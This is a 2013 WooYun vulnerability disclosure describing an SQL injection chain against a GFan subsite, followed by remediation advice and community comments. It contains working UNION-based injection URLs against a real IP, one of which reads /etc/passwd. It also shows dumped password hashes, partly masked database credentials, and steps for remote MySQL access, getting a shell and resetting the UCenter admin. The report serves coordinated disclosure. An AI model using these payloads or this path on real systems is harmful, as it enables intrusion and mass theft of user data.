当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034176

漏洞标题:机锋网某分站存在SQL注入漏洞导致2000万用户信息告急

相关厂商:机锋网

漏洞作者: 猪猪侠

提交时间:2013-08-12 15:48

修复时间:2013-09-26 15:48

公开时间:2013-09-26 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-12: 细节已通知厂商并且等待厂商处理中
2013-08-14: 厂商已经确认,细节仅向厂商公开
2013-08-24: 细节向核心白帽子及相关领域专家公开
2013-09-03: 细节向普通白帽子公开
2013-09-13: 细节向实习白帽子公开
2013-09-26: 细节向公众公开

简要描述:

利用了乌云白帽子 kobin97 以前提交的一个已公开的漏洞外加几个运维缺陷
间接造成2000万注册用户信息泄露风险。
安全是一个整体,保证安全不在于强大的地方有多强大,而在于真正薄弱的地方在哪里

详细说明:

#1 通过扫描整个机锋网所在网络的C段
发现http://117.79.80.23:8000/robots.txt 使用了HDWiki,同时HDwiki存在多个高危的SQL注入漏洞。
~! 同时还有phpinfo信息泄露
http://117.79.80.23:8000/info.php

gfan_phpinfo.jpg


#2 SQL注入漏洞利用
相关信息:kobin97 提交的 WooYun: HDwiki某SQL注射和鸡肋文件包含
~! 读文件
http://117.79.80.23:8000/?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,concat%28username,0x7c,load_file('/etc/passwd')%29,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20wiki_user%20where%20groupid=4%23
~! 注入
http://117.79.80.23:8000/?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,concat%28username,0x7c,password%29,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20wiki_user%20where%20groupid=4%23
webmaster|0c3cc2b229a290c98e6b161a607f48d3
~! 由于SQL用户是root权限,所以可以查询所有mysql.users的信息

%|readonly|*56136B3287D********8FBDF4CAC915AED46333
%|root|*8A69D03C179A66324D2E********6645035BCFD7
%|approot|*8A69D03C179A66324D2E********6645035BCFD7


~! 同时本漏洞不受GPC的影响,可以outfile。
#3 有了wiki的管理员密码,后来却发现这个WIKI残破不堪,没办法登录后台

gfan_qiantai.jpg


这里想过一些办法但是最终没有绕过进入后台。
#4 找到了这么多问题,不可以轻易放弃,SO 重新整理已有信息,再间接利用
通过扫描对应C段的portMap,发现几个IP开了3306端口,于是用注入得到的mysql用户连接数据库,远程成功连接上去了。

gfan_remote_mysql.jpg


#5 你没看错,直接连上了,数据库一堆,又可以重新整合获取的信息再次重整思路
~! 利用点1,存在很多discuz论坛的数据库,直接读取管理员密码进入后台拿shell
~! 利用点2,存在多个应用系统的数据库,也可以间接读取管理员密码进入后台
~! 打字太累,出续集好了。
#6 初探用户信息
我们知道机锋网的用户登录API全都交由passport.gfan.com这个入口来处理,所以必须获取到这里的权限,才能读到所有用户信息。
扫描得到如下phpinfo:
http://passport.gfan.com/gfan_uc/phpinfo.php

gfan_ucenter_phpinfo.jpg


~! 利用另外一些信息,获取了某个论坛的shell,通过读取的UC_KEY,重置了UCenter后台管理员的密码,进入UCenter后台。

漏洞证明:

~! 再间接通过读取UCenter的配置,获得UCenter的链接密码。

<?php 
define('UC_DBHOST', '10.8.8.**');
define('UC_DBUSER', 'uczooer');
define('UC_DBPW', 'Azzt********kY88');
define('UC_DBNAME', 'ucenter');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', 'uc_');


# 直接连接数据库,探到用户信息

gfan_applications.jpg


gfan_uc_members_count.jpg


修复方案:

#1 使用第三方开源程序,应当时刻关注补丁信息
#2 MYSQL应当设置为禁止远程连接模式,或者直接3306端口设置访问控制规则
#3 尽量使系统简单化,不要让单个用户的权限过高。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-14 15:10

厂商回复:

已确认。请告知联系方式:)

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-12 15:49 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    2000万用户信息告急!!!

  2. 2013-08-12 15:51 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    2000万用户信息告急!!!

  3. 2013-08-12 15:51 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    2000万用户信息告急!!!

  4. 2013-08-12 15:53 | 佐瞳 ( 路人 | Rank:2 漏洞数:3 | 专业小白二十年~)

    2000万用户信息告急!!!

  5. 2013-08-12 15:54 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    对神马千万级别已然盲目 还不如自己脱了玩

  6. 2013-08-12 15:59 | cnbird ( 普通白帽子 | Rank:547 漏洞数:47 | http://blog.csdn.net/cnbird2008)

    内裤大盗

  7. 2013-08-12 16:14 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    2000万用户信息告急!!!

  8. 2013-08-12 16:16 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    2000万用户信息告急!!!

  9. 2013-08-12 16:28 | 啦绯哥 ( 普通白帽子 | Rank:107 漏洞数:20 )

    在机锋的漏洞列表中怎么没有看到kobin97提交的漏洞。。。

  10. 2013-08-12 16:30 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    同楼上,我也没找到

  11. 2013-08-12 16:30 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    2013-07-22 15:39 | 猪猪侠 (核心白帽子 | Rank:649 漏洞数:50 | 你都有那么多超级棒棒糖了,还要自由干吗?) 小哥,你看这个厂商对待漏洞的历史记录,还提交? 这一看又是被忽略的节奏!

  12. 2013-08-12 16:32 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @Passer_by 不可能忽略的,这是20rank的节奏,这是大礼包滴干活

  13. 2013-08-12 16:39 | Master ( 路人 | Rank:29 漏洞数:10 )

    如果洞主发个baidu盘加密连接 大家和你还是好朋友

  14. 2013-08-12 17:49 | 普瑞斯特 ( 实习白帽子 | Rank:65 漏洞数:6 )

    如果洞主发个baidu盘加密连接 大家和你还是好朋友

  15. 2013-08-12 21:09 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    厂商发次礼物吧

  16. 2013-08-12 21:11 | nick被注册 ( 普通白帽子 | Rank:125 漏洞数:20 | 天一)

    会不会忽略?

  17. 2013-08-12 22:45 | feng ( 普通白帽子 | Rank:664 漏洞数:79 | 想刷个6D)

    咋变普通白帽子了 求解释

  18. 2013-08-13 00:57 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @feng 这都被你发现了,观察得真细致啊。

  19. 2013-08-13 12:37 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)

    2000万用户信息告急!!!

  20. 2013-08-14 16:48 | 啦绯哥 ( 普通白帽子 | Rank:107 漏洞数:20 )

    @feng 请参考http://zone.wooyun.org/content/5874